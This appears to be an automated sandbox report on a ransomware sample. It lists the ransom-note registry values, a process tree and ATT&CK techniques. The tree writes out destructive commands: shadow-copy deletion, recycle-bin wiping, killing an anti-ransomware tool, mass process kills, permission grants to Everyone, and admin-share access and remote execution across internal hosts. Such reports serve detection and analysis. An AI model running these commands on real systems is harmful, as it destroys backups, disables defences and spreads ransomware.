e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe

C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
"C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe"
1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3368
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:3372
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:3488
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1264
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:2200
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1748
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:2120
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:3944
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:2648
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:4000
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:3364
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1596
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:2168
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1848
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3200
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2876
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2608
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3376
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3568
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1868
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3756
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:212
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3396
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1952
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4064
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4016
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3440
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1240
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1928
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3788
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:3872
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:848
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3576
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4108
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4164
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4208
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4260
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4300
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:4372
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:4392
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4444
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4556
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4620
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:4656
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4576
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4712
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4844
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4900
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4948
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5036
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5100
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3524
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2588
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2100
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3536
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2548
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:4256
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4204
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4400
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:212
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2168
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4336
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:4528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4324
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4372
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4584
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4432
- C:\Users\Admin\AppData\Local\Temp\qy5ts0jh.exe
  "C:\Users\Admin\AppData\Local\Temp\qy5ts0jh.exe" \\10.10.0.41 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe"
  2⤵
  - Executes dropped EXE
  PID:4896
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:4932
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4392
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:5072
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\Users
  2⤵
  PID:4172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\Users
  2⤵
  PID:3416
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\A$
  2⤵
  PID:4168
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\A$
  2⤵
  PID:4192
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\B$
  2⤵
  PID:2704
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\B$
  2⤵
  PID:2100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\C$
  2⤵
  PID:4400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\C$
  2⤵
  PID:4280
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\D$
  2⤵
  PID:4176
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\D$
  2⤵
  PID:1952
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\E$
  2⤵
  PID:4696
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\E$
  2⤵
  PID:3756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\F$
  2⤵
  PID:3372
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\F$
  2⤵
  PID:3836
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\G$
  2⤵
  PID:4064
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\G$
  2⤵
  PID:4984
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\H$
  2⤵
  PID:3396
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\H$
  2⤵
  PID:4520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\I$
  2⤵
  PID:2668
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\I$
  2⤵
  PID:4456
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\J$
  2⤵
  PID:4480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.16\J$
  2⤵
  PID:4564
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\Users
  2⤵
  PID:4672
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\K$
  2⤵
  PID:4560
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\K$
  2⤵
  PID:4608
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\A$
  2⤵
  PID:4772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\L$
  2⤵
  PID:4556
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\L$
  2⤵
  PID:4640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\B$
  2⤵
  PID:4708
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\M$
  2⤵
  PID:5092
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\M$
  2⤵
  PID:4972
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\N$
  2⤵
  PID:4936
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\C$
  2⤵
  PID:5032
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\N$
  2⤵
  PID:4044
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\D$
  2⤵
  PID:1756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\O$
  2⤵
  PID:2628
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\O$
  2⤵
  PID:4240
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\E$
  2⤵
  PID:2264
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\P$
  2⤵
  PID:3800
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\F$
  2⤵
  PID:4284
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\P$
  2⤵
  PID:184
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\Q$
  2⤵
  PID:3708
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\Q$
  2⤵
  PID:4344
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\G$
  2⤵
  PID:1016
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\R$
  2⤵
  PID:2848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\R$
  2⤵
  PID:4272
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\H$
  2⤵
  PID:3088
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\S$
  2⤵
  PID:3200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\S$
  2⤵
  PID:4468
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\I$
  2⤵
  PID:2120
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\T$
  2⤵
  PID:4356
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\J$
  2⤵
  PID:4164
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\T$
  2⤵
  PID:4108
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\U$
  2⤵
  PID:2608
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\K$
  2⤵
  PID:4396
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\U$
  2⤵
  PID:4436
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\V$
  2⤵
  PID:4904
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\L$
  2⤵
  PID:4892
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\W$
  2⤵
  PID:4648
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\V$
  2⤵
  PID:2168
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\M$
  2⤵
  PID:4672
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\X$
  2⤵
  PID:4608
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\W$
  2⤵
  PID:4756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\N$
  2⤵
  PID:4728
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\Y$
  2⤵
  PID:4556
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\X$
  2⤵
  PID:4844
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\O$
  2⤵
  PID:4576
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\Z$
  2⤵
  PID:5092
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\Y$
  2⤵
  PID:5096
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\P$
  2⤵
  PID:4060
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\Z$
  2⤵
  PID:4896
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\Q$
  2⤵
  PID:3996
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\R$
  2⤵
  PID:2484
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\S$
  2⤵
  PID:2868
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\T$
  2⤵
  PID:5100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\U$
  2⤵
  PID:4240
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\V$
  2⤵
  PID:3416
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\W$
  2⤵
  PID:1860
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\X$
  2⤵
  PID:2256
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\Y$
  2⤵
  PID:2588
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.21\Z$
  2⤵
  PID:4344
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\Users
  2⤵
  PID:4880
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\A$
  2⤵
  PID:4804
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\B$
  2⤵
  PID:4660
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\C$
  2⤵
  PID:4148
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\D$
  2⤵
  PID:4540
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\E$
  2⤵
  PID:1884
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\F$
  2⤵
  PID:4352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\G$
  2⤵
  PID:4940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\H$
  2⤵
  PID:3876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\I$
  2⤵
  PID:2320
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\J$
  2⤵
  PID:4412
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\K$
  2⤵
  PID:5004
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\L$
  2⤵
  PID:2200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\M$
  2⤵
  PID:4104
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\N$
  2⤵
  PID:4652
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\O$
  2⤵
  PID:212
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\P$
  2⤵
  PID:4620
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\Q$
  2⤵
  PID:4876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\R$
  2⤵
  PID:4952
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\S$
  2⤵
  PID:4956
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\T$
  2⤵
  PID:4392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\U$
  2⤵
  PID:5084
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\V$
  2⤵
  PID:3512
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\W$
  2⤵
  PID:2584
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\X$
  2⤵
  PID:3920
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\Y$
  2⤵
  PID:2104
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.27\Z$
  2⤵
  PID:3076
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\Users
  2⤵
  PID:3760
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\A$
  2⤵
  PID:2580
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\B$
  2⤵
  PID:2628
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\C$
  2⤵
  PID:4468
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\D$
  2⤵
  PID:5100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\N$
  2⤵
  PID:3000
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\H$
  2⤵
  PID:2100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\O$
  2⤵
  PID:4320
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\I$
  2⤵
  PID:3708
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\P$
  2⤵
  PID:4800
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\J$
  2⤵
  PID:4380
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\K$
  2⤵
  PID:1272
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\Q$
  2⤵
  PID:4388
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\R$
  2⤵
  PID:4968
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\L$
  2⤵
  PID:4992
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\S$
  2⤵
  PID:4964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\M$
  2⤵
  PID:3836
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\U$
  2⤵
  PID:4376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\T$
  2⤵
  PID:4848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\V$
  2⤵
  PID:5116
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\E$
  2⤵
  PID:4732
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\W$
  2⤵
  PID:3380
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\X$
  2⤵
  PID:4312
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\Y$
  2⤵
  PID:4100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.28\Z$
  2⤵
  PID:4548

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Filesize
2KB

MD5
4163ec5b7401472725e0f2e034ba2425

SHA1
5367503941303dfc8118e73e27b35a7b0261ce7e

SHA256
0b5779450c48991af2cd1c01471be260aa80e113b54305c9c275482928cfe6ef

SHA512
